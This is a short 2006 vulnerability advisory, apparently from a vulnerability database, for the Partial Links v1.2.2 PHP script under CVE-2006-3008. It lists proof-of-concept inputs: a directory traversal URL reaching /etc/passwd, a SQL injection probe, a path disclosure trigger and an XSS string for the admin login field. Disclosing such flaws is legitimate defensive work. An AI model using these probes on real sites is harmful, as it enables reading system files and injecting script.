Partial Links v1.2.2 - XSS , Directory traversal

2006-06-14 / 2006-06-15

Credit: luny youfucktard com

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-3008

CWE: CWE-79

Partial Links v1.2.2
Homepage:
http://www.particlesoft.net/particlelinks/
Effected files:
index.php
page_footer.php
admin.php
Exploits & Vulnerabilities:
Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/
SQL Injection:
http://www.example.com/index.php?topic='
Full path disclosure via page_footer.php:
http://www.example.com/includes/page_footer.php
Fatal error: Call to a member function on a non-object in /home/username/public_html/links/includes/page_footer.php
on line 3
((It should be notedpage_header.php gives full path errors too))
The input form box to login as admin can be spoofed to remove the max char limit allowed and the input data isn't properally sanatized before being generated dynamically too.
For proof of concept try entering the following in the username box:
>'';!--"<XSS><img src=lol.jpg>=&{()}<

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Partial Links v1.2.2 - XSS , Directory traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.